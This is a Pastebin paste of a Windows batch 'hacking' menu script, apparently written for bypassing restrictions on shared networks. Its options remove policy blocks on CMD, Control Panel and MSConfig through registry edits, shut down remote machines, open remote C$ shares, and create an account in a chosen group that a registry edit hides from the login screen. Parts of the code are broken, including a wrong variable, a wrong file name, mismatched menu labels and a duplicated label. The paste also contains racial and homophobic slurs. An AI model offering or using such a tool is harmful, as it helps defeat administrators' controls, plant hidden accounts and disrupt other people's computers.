Guest User

Untitled

a guest
Mar 14th, 2018
181
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.94 KB | None | 0 0
  1. @echo off
  2. color 0c
  3. title project
  4. :begin
  5. cls
  6.  
  7. echo Hello %username%
  8. echo.
  9. echo Options my nigga
  10. echo.
  11. echo 1) Send message
  12. echo 2) Show computers in ntwrk
  13. echo 3) Start CMD
  14. echo 4) Unblock CMD
  15. echo 5) Start CPanel
  16. echo 6) Unblock CPanel
  17. echo 7) C:\
  18. echo 8) IP
  19. echo 9) Make an admin account on this network
  20. echo 10) Information
  21. echo 11) Remote shutdown
  22. echo 14) Start MSConfig
  23. echo 15) Unblock MSConfig
  24. echo 16) crap
  25. echo Exit) exit
  26. echo.
  27. echo Time: %time% %date%
  28. echo.
  29. set /p begin=Command:
  30. if "%begin%"=="1" goto one
  31. if "%begin%"=="2" goto two
  32. if "%begin%"=="3" goto three
  33. if "%begin%"=="4" goto four
  34. if "%begin%"=="5" goto five
  35. if "%begin%"=="6" goto six
  36. if "%begin%"=="7" goto seven
  37. if "%begin%"=="8" goto eight
  38. if "%begin%"=="9" goto nine
  39. if "%begin%"=="10" goto ten
  40. if "%begin%"=="11" goto eleven
  41. if "%begin%"=="12" goto twelve
  42. if "%begin%"=="13" goto thirteen
  43. if "%begin%"=="14" goto fourteen
  44. if "%begin%"=="15" goto fifteen
  45. if "%begin%"=="exit" goto exit
  46. echo "%begin%" err0r
  47. pause >nul
  48. goto begin
  49.  
  50. :one
  51. cls
  52. echo.
  53. echo IMPORTANT: The person you are trying to message must have this open!
  54. echo.
  55. set /p ns=Who do you want to send the message to?:
  56. set /p message=Message:
  57. Net send %ns% "%message%"
  58. echo.
  59. echo Press 'Enter' to return to menu
  60. pause >NUL
  61. goto begin
  62.  
  63. :two
  64. cls
  65. echo.
  66. echo Computers on network
  67. echo.
  68. net view
  69. pause >NUL
  70. goto begin
  71.  
  72. :three
  73. start cmd
  74. pause >NUL
  75. goto begin
  76.  
  77. :four
  78. cls
  79. echo.
  80. echo make temporaily .reg
  81. echo.
  82. echo Windows Registry Editor Version 5.00 > control.reg
  83. echo. >> control.reg
  84. echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> control.reg
  85. echo "NoControlPanel"=dword:00000000 >> control.reg
  86. start control.reg
  87. echo Press 'Enter' to return to menu
  88. pause >NUL
  89. ping 1.1.1.1 -n 1 -w 1500 >NUL
  90. del control.reg
  91. goto begin
  92.  
  93. :five
  94. start CONTROL
  95. pause >NUL
  96. goto begin
  97.  
  98. :six
  99. cls
  100. echo.
  101. echo make temporaily .reg
  102. echo.
  103. echo Windows Registry Editor Version 5.00 > control.reg
  104. echo. >> control.reg
  105. echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> control.reg
  106. echo "NoControlPanel"=dword:00000000 >> control.reg
  107. start control.reg
  108. echo Press 'Enter' to return to menu
  109. pause >NUL
  110. ping 1.1.1.1 -n 1 -w 1500 >NUL
  111. del control.reg
  112. goto begin
  113.  
  114. :seven
  115. cls
  116. echo.
  117. echo You must have the computer you are using's name!
  118. echo.
  119. set /p pc=ComputerName:
  120. explorer \\%pc%\c$
  121. pause >NUL
  122. goto begin
  123.  
  124. :eight
  125. cls
  126. ipconfig /all
  127. pause >NUL
  128. goto begin
  129.  
  130. :nine
  131. cls
  132. echo.
  133. echo Make account with admin rights
  134. echo.
  135. SET /P NAME=Name :
  136. SET /P PASS=Password :
  137. ECHO Available groups list:
  138. net localgroup | find "*"
  139. SET /P GROUP=Group:
  140. net user %NAME% %PASS% /add
  141. net localgroup "%GROUP%" %NAME% /add
  142. echo.
  143. echo Windows Registry Editor Version 5.00>%TEMP%\hard.reg
  144. echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>>%TEMP%\hard.reg
  145. echo "%NAME%"=dword:00000000>>%TEMP%\hard.reg
  146. Regedit /s %TEMP%\addregistry.reg
  147. if %errorlevel% GTR 0 msg * FAIL
  148. msg * Done.
  149. Del %TEMP%\hard.reg
  150.  
  151. :ten
  152. cls
  153. echo.
  154. echo Computer info
  155. echo.
  156. echo Computer Name: %computername%
  157. echo Username: %username%
  158. echo Login: %logonserver%
  159. echo Windows Folder: %windir%
  160. echo System Drive Folder: %systemdrive%
  161. echo User Domain: %userdomain%
  162. echo Program Files Folder: %programfiles%
  163. echo Profile Folder: %userprofile%
  164. echo System32 Folder: %systemdrive%\windows\system32
  165. echo Temp Folder: %temp%
  166. echo.
  167. echo Press 'Enter' to return to menu.
  168. pause >NUL
  169. goto begin
  170.  
  171. :eleven
  172. echo.
  173. echo Remote Shutdown
  174. echo.
  175. set /p shutdown=ComputerName:
  176. set /p Time=Time:
  177. set /p msg=message:
  178. shutdown -m \\%shutdown%\ -s -t %tijd% -c "%msg%"
  179. pause >NUL
  180. goto begin
  181.  
  182. :twelve
  183. cls
  184. echo.
  185. echo Created by ANonymousX! for educational purpose only!
  186. echo.
  187. echo Have fun :)
  188. pause >NUL
  189. goto begin
  190.  
  191. :sixteen
  192. cls
  193. echo.
  194. echo FAGGOT FAGGOT FAGGOT FAGGOT FAGGOT FAGGOT FAGGOT!
  195. echo.
  196. echo __
  197. echo / /\
  198. echo / / /
  199. echo / / / __
  200. echo /_/ / / /\
  201. echo \ \ \ / / \
  202. echo \ \ \/ / /\ \
  203. echo __ \ \ \/ /\ \ \
  204. echo /_/\ \_\ / \ \ \
  205. echo \ \ \ / / \ \_\/
  206. echo \ \ \/ / /\ \
  207. echo \ \ \/ /\ \ \
  208. echo \ \ / \ \ \
  209. echo \_\/ / / /
  210. echo / / /
  211. echo /_/ /
  212. echo \_\/
  213. echo.
  214. echo FAGGOT FAGGOT FAGGOT FAGGOT FAGGOT FAGGOT FAGGOT!
  215. echo.
  216. pause >NUL
  217. goto begin
  218.  
  219. :fourteen
  220. %SystemRoot%\pchealth\helpctr\binaries\msconfig.exe
  221. pause >NUL
  222. goto begin
  223.  
  224. :fifteen
  225. cls
  226. echo.
  227. echo make temporaily .reg
  228. echo.
  229. echo Windows Registry Editor Version 5.00 > msconfig.reg
  230. echo. >> msconfig.reg
  231. echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\MSCONFIG.EXE] >> msconfig.reg
  232. echo "NoControlPanel"=dword:00000000 >> msconfig.reg
  233. start msconfig.reg
  234. echo Press 'Enter' to return to menu
  235. pause >NUL
  236. ping 1.1.1.1 -n 1 -w 1500 >NUL
  237. del msconfig.reg
  238. goto begin
  239.  
  240. :sixteen
  241. echo herro
  242.  
  243. :exit
Add Comment
Please, Sign In to add comment